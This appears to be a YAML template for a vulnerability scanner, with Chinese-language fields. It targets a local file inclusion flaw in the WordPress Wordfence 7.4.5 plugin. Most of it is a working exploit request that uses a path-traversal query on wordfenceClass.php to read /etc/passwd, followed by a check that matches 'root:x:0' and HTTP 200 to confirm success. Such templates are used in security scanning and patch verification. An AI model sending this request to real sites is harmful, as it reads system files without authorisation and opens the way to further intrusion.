product: WordPress
vName: WordPress Wordfence 7.4.5 - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/48061
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
    verify:
      logic: and
      check:
        - regex:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
